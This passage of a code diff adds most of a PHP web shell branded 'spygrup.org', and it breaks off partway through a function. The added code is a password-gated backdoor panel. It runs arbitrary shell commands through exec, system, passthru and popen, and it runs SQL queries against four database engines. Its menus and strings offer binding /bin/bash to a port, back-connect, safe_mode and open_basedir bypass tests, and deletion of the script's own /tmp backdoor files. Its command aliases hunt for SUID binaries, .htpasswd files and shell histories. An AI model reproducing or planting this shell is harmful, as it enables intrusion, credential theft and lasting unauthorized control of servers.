+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- ??????????  ???? -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+????? ?????
+$language='eng' - ???????
+$language='ru' - ??????????
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text77'=>'???????? ????????? ???? ??????',
+'ru_text78'=>'?????????? ???????',
+'ru_text79'=>'?????????? ???????',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
